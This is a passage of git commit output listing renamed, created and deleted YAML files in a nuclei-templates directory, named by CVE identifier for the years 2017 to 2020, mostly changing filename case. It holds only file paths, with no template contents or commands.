CVE-2017-12611.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12794.yaml => CVE-2017-12794.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-14135.yaml => CVE-2017-14135.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-15647.yaml => CVE-2017-15647.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-15944.yaml => CVE-2017-15944.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/CVE-2017-16894.yaml create mode 100644 nuclei-templates/CVE-2017/CVE-2017-17736.yaml rename nuclei-templates/CVE-2017/{cve-2017-18024.yaml => CVE-2017-18024.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-18638.yaml => CVE-2017-18638.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-6361.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-7504.yaml create mode 100644 nuclei-templates/CVE-2017/CVE-2017-8229.yaml rename nuclei-templates/CVE-2017/{cve-2017-9506.yaml => CVE-2017-9506.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-1000027.yaml => cve-2017-1000027.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/cve-2017-11512.yaml rename nuclei-templates/CVE-2017/{CVE-2017-11586.yaml => cve-2017-11586.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-12544.yaml => cve-2017-12544.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-12635.yaml => cve-2017-12635.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-14849.yaml => cve-2017-14849.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-18536.yaml => cve-2017-18536.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-3528.yaml => cve-2017-3528.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-5521.yaml => cve-2017-5521.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-5982.yaml => cve-2017-5982.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/cve-2017-6361.yaml rename nuclei-templates/CVE-2017/{CVE-2017-9288.yaml => cve-2017-9288.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-0296.yaml => CVE-2018-0296.yaml} 
(100%) rename nuclei-templates/CVE-2018/{cve-2018-1000129.yaml => CVE-2018-1000129.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-1000671.yaml rename nuclei-templates/CVE-2018/{cve-2018-1000861.yaml => CVE-2018-1000861.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-10093.yaml => CVE-2018-10093.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-10095.yaml => CVE-2018-10095.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-11409.yaml => CVE-2018-11409.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-11709.yaml rename nuclei-templates/CVE-2018/{cve-2018-11776.yaml => CVE-2018-11776.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-12054.yaml => CVE-2018-12054.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-1207.yaml => CVE-2018-1207.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-12300.yaml rename nuclei-templates/CVE-2018/{cve-2018-12634.yaml => CVE-2018-12634.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-12675.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-12909.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-13980.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-14064.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-14574.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-14918.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-15138.yaml rename nuclei-templates/CVE-2018/{cve-2018-15517.yaml => CVE-2018-15517.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-15640.yaml => CVE-2018-15640.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-15745.yaml => CVE-2018-15745.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-15961.yaml rename nuclei-templates/CVE-2018/{cve-2018-16059.yaml => CVE-2018-16059.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16288.yaml => CVE-2018-16288.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16299.yaml => CVE-2018-16299.yaml} 
(100%) rename nuclei-templates/CVE-2018/{cve-2018-16763.yaml => CVE-2018-16763.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-17246.yaml => CVE-2018-17246.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-17254.yaml => CVE-2018-17254.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-17422.yaml rename nuclei-templates/CVE-2018/{cve-2018-17431.yaml => CVE-2018-17431.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18069.yaml rename nuclei-templates/CVE-2018/{cve-2018-18323.yaml => CVE-2018-18323.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18608.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-18778.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19386.yaml rename nuclei-templates/CVE-2018/{cve-2018-19458.yaml => CVE-2018-19458.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19518.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19749.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19751.yaml rename nuclei-templates/CVE-2018/{cve-2018-19753.yaml => CVE-2018-19753.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19877.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19892.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19914.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19915.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-20009.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-20010.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-20011.yaml rename nuclei-templates/CVE-2018/{cve-2018-2392.yaml => CVE-2018-2392.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-3810.yaml rename nuclei-templates/CVE-2018/{cve-2018-5316.yaml => CVE-2018-5316.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-6910.yaml => CVE-2018-6910.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-7251.yaml => CVE-2018-7251.yaml} (100%) delete mode 100644 
nuclei-templates/CVE-2018/CVE-2018-7490.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-7700.yaml rename nuclei-templates/CVE-2018/{cve-2018-7719.yaml => CVE-2018-7719.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-8727.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-9161.yaml rename nuclei-templates/CVE-2018/{cve-2018-9205.yaml => CVE-2018-9205.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-9995.yaml => CVE-2018-9995.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-1000671.yaml rename nuclei-templates/CVE-2018/{CVE-2018-1000856.yaml => cve-2018-1000856.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-11510.yaml => cve-2018-11510.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-11709.yaml rename nuclei-templates/CVE-2018/{CVE-2018-11759.yaml => cve-2018-11759.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-12031.yaml => cve-2018-12031.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-12300.yaml rename nuclei-templates/CVE-2018/{CVE-2018-12613.yaml => cve-2018-12613.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-12675.yaml rename nuclei-templates/CVE-2018/{CVE-2018-1273.yaml => cve-2018-1273.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-1335.yaml => cve-2018-1335.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-13980.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-14064.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-14574.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-14918.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-15138.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-15961.yaml rename nuclei-templates/CVE-2018/{CVE-2018-16671.yaml => cve-2018-16671.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-16716.yaml => cve-2018-16716.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-17422.yaml create mode 100644 
nuclei-templates/CVE-2018/cve-2018-18069.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18608.yaml rename nuclei-templates/CVE-2018/{CVE-2018-18777.yaml => cve-2018-18777.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-18778.yaml rename nuclei-templates/CVE-2018/{CVE-2018-18925.yaml => cve-2018-18925.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-19136.yaml => cve-2018-19136.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19386.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19749.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19751.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19877.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19892.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19914.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19915.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-20009.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-20010.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-20011.yaml rename nuclei-templates/CVE-2018/{CVE-2018-20985.yaml => cve-2018-20985.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-3810.yaml rename nuclei-templates/CVE-2018/{CVE-2018-5233.yaml => cve-2018-5233.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-7490.yaml rename nuclei-templates/CVE-2018/{CVE-2018-7600.yaml => cve-2018-7600.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-7700.yaml rename nuclei-templates/CVE-2018/{CVE-2018-8006.yaml => cve-2018-8006.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-8727.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-9161.yaml rename nuclei-templates/CVE-2018/{CVE-2018-9845.yaml => cve-2018-9845.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-0193.yaml => CVE-2019-0193.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-0230.yaml => CVE-2019-0230.yaml} (100%) delete mode 
100644 nuclei-templates/CVE-2019/CVE-2019-1010287.yaml rename nuclei-templates/CVE-2019/{cve-2019-10475.yaml => CVE-2019-10475.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-10717.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-10758.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-11013.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-11043.yaml rename nuclei-templates/CVE-2019/{cve-2019-12314.yaml => CVE-2019-12314.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-12581.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-12616.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-12962.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-13396.yaml rename nuclei-templates/CVE-2019/{cve-2019-14205.yaml => CVE-2019-14205.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-14223.yaml => CVE-2019-14223.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-14251.yaml rename nuclei-templates/CVE-2019/{cve-2019-14322.yaml => CVE-2019-14322.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-14974.yaml rename nuclei-templates/CVE-2019/{cve-2019-15107.yaml => CVE-2019-15107.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-15858.yaml => CVE-2019-15858.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-15859.yaml => CVE-2019-15859.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-16097.yaml => CVE-2019-16097.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-16313.yaml => CVE-2019-16313.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-1653.yaml => CVE-2019-1653.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-16662.yaml => CVE-2019-16662.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-16759.yaml => CVE-2019-16759.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-17270.yaml => CVE-2019-17270.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-17382.yaml delete mode 100644 
nuclei-templates/CVE-2019/CVE-2019-17444.yaml rename nuclei-templates/CVE-2019/{cve-2019-17506.yaml => CVE-2019-17506.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-17538.yaml => CVE-2019-17538.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-1821.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-18371.yaml rename nuclei-templates/CVE-2019/{cve-2019-18394.yaml => CVE-2019-18394.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-18665.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-18818.yaml rename nuclei-templates/CVE-2019/{cve-2019-2725.yaml => CVE-2019-2725.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-2729.yaml => CVE-2019-2729.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-3401.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-3402.yaml rename nuclei-templates/CVE-2019/{cve-2019-3799.yaml => CVE-2019-3799.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-3912.yaml rename nuclei-templates/CVE-2019/{cve-2019-5127.yaml => CVE-2019-5127.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-6715.yaml => CVE-2019-6715.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7219.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7238.yaml rename nuclei-templates/CVE-2019/{cve-2019-8446.yaml => CVE-2019-8446.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-8449.yaml rename nuclei-templates/CVE-2019/{cve-2019-8451.yaml => CVE-2019-8451.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-8903.yaml => CVE-2019-8903.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9915.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9922.yaml rename nuclei-templates/CVE-2019/{CVE-2019-10068.yaml => cve-2019-10068.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-1010287.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-10717.yaml delete mode 100644 
nuclei-templates/CVE-2019/cve-2019-10758.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-11013.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-11043.yaml rename nuclei-templates/CVE-2019/{CVE-2019-12461.yaml => cve-2019-12461.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-12581.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-12616.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-12962.yaml rename nuclei-templates/CVE-2019/{CVE-2019-13392.yaml => cve-2019-13392.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-13396.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-14251.yaml rename nuclei-templates/CVE-2019/{CVE-2019-14470.yaml => cve-2019-14470.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-14974.yaml rename nuclei-templates/CVE-2019/{CVE-2019-15043.yaml => cve-2019-15043.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-15811.yaml => cve-2019-15811.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-16332.yaml => cve-2019-16332.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-16932.yaml => cve-2019-16932.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-17382.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-17444.yaml rename nuclei-templates/CVE-2019/{CVE-2019-17558.yaml => cve-2019-17558.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-1821.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-18371.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-18665.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-18818.yaml rename nuclei-templates/CVE-2019/{CVE-2019-19134.yaml => cve-2019-19134.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-19781.yaml => cve-2019-19781.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-19908.yaml => cve-2019-19908.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-20141.yaml => cve-2019-20141.yaml} (100%) rename 
nuclei-templates/CVE-2019/{CVE-2019-20210.yaml => cve-2019-20210.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-20354.yaml => cve-2019-20354.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-20933.yaml => cve-2019-20933.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-3401.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-3402.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-3912.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-7219.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-7238.yaml rename nuclei-templates/CVE-2019/{CVE-2019-7275.yaml => cve-2019-7275.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-8449.yaml rename nuclei-templates/CVE-2019/{CVE-2019-9726.yaml => cve-2019-9726.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-9915.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-9922.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-10220.yaml rename nuclei-templates/CVE-2020/{cve-2020-10546.yaml => CVE-2020-10546.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-10547.yaml => CVE-2020-10547.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-10770.yaml rename nuclei-templates/CVE-2020/{cve-2020-11455.yaml => CVE-2020-11455.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-11546.yaml => CVE-2020-11546.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-11854.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-11930.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-11991.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-12259.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-12447.yaml rename nuclei-templates/CVE-2020/{cve-2020-12720.yaml => CVE-2020-12720.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-12800.yaml => CVE-2020-12800.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-13405.yaml delete mode 100644 
nuclei-templates/CVE-2020/CVE-2020-13483.yaml rename nuclei-templates/CVE-2020/{cve-2020-13700.yaml => CVE-2020-13700.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-13937.yaml => CVE-2020-13937.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-14179.yaml => CVE-2020-14179.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15148.yaml => CVE-2020-15148.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-15505.yaml rename nuclei-templates/CVE-2020/{cve-2020-16139.yaml => CVE-2020-16139.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-16920.yaml rename nuclei-templates/CVE-2020/{cve-2020-16952.yaml => CVE-2020-16952.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-17362.yaml => CVE-2020-17362.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-17518.yaml => CVE-2020-17518.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-18268.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-19282.yaml rename nuclei-templates/CVE-2020/{cve-2020-1938.yaml => CVE-2020-1938.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-1956.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-19625.yaml rename nuclei-templates/CVE-2020/{cve-2020-2096.yaml => CVE-2020-2096.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-20988.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-2103.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-2199.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-22210.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-23015.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-23517.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-24589.yaml rename nuclei-templates/CVE-2020/{cve-2020-27361.yaml => CVE-2020-27361.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-28188.yaml => CVE-2020-28188.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-28208.yaml => CVE-2020-28208.yaml} (100%) delete 
mode 100644 nuclei-templates/CVE-2020/CVE-2020-28351.yaml rename nuclei-templates/CVE-2020/{cve-2020-29395.yaml => CVE-2020-29395.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-29453.yaml => CVE-2020-29453.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-3187.yaml => CVE-2020-3187.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-35338.yaml rename nuclei-templates/CVE-2020/{cve-2020-35476.yaml => CVE-2020-35476.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-35580.yaml => CVE-2020-35580.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-35598.yaml => CVE-2020-35598.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-35749.yaml rename nuclei-templates/CVE-2020/{cve-2020-35848.yaml => CVE-2020-35848.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-36287.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-36365.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-5307.yaml rename nuclei-templates/CVE-2020/{cve-2020-5410.yaml => CVE-2020-5410.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-5775.yaml => CVE-2020-5775.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-5847.yaml => CVE-2020-5847.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-6207.yaml => CVE-2020-6207.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-6308.yaml => CVE-2020-6308.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7048.yaml => CVE-2020-7048.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7209.yaml => CVE-2020-7209.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-7247.yaml rename nuclei-templates/CVE-2020/{cve-2020-7796.yaml => CVE-2020-7796.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-7943.yaml rename nuclei-templates/CVE-2020/{cve-2020-8115.yaml => CVE-2020-8115.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8163.yaml => CVE-2020-8163.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8209.yaml => 
CVE-2020-8209.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8497.yaml => CVE-2020-8497.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8512.yaml => CVE-2020-8512.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8515.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8771.yaml rename nuclei-templates/CVE-2020/{cve-2020-8813.yaml => CVE-2020-8813.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9036.yaml => CVE-2020-9036.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9054.yaml => CVE-2020-9054.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9315.yaml => CVE-2020-9315.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-9402.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-9496.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-10199.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-10220.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-10770.yaml rename nuclei-templates/CVE-2020/{CVE-2020-1147.yaml => cve-2020-1147.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-11854.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-11930.yaml rename nuclei-templates/CVE-2020/{CVE-2020-11978.yaml => cve-2020-11978.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-11991.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-12259.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-12447.yaml rename nuclei-templates/CVE-2020/{CVE-2020-13158.yaml => cve-2020-13158.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-13167.yaml => cve-2020-13167.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-13405.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-13483.yaml rename nuclei-templates/CVE-2020/{CVE-2020-13927.yaml => cve-2020-13927.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-14181.yaml => cve-2020-14181.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-14883.yaml => 
cve-2020-14883.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-15129.yaml => cve-2020-15129.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-15227.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-15505.yaml rename nuclei-templates/CVE-2020/{CVE-2020-15920.yaml => cve-2020-15920.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-16846.yaml => cve-2020-16846.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-18268.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-19282.yaml rename nuclei-templates/CVE-2020/{CVE-2020-19283.yaml => cve-2020-19283.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-1956.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-19625.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-20988.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-2103.yaml rename nuclei-templates/CVE-2020/{CVE-2020-22209.yaml => cve-2020-22209.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-22840.yaml => cve-2020-22840.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-23015.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-23517.yaml rename nuclei-templates/CVE-2020/{CVE-2020-23575.yaml => cve-2020-23575.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-24312.yaml => cve-2020-24312.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-24550.yaml => cve-2020-24550.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-24571.yaml => cve-2020-24571.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-24589.yaml rename nuclei-templates/CVE-2020/{CVE-2020-25223.yaml => cve-2020-25223.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-2551.yaml => cve-2020-2551.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-26073.yaml => cve-2020-26073.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-28351.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-35338.yaml rename 
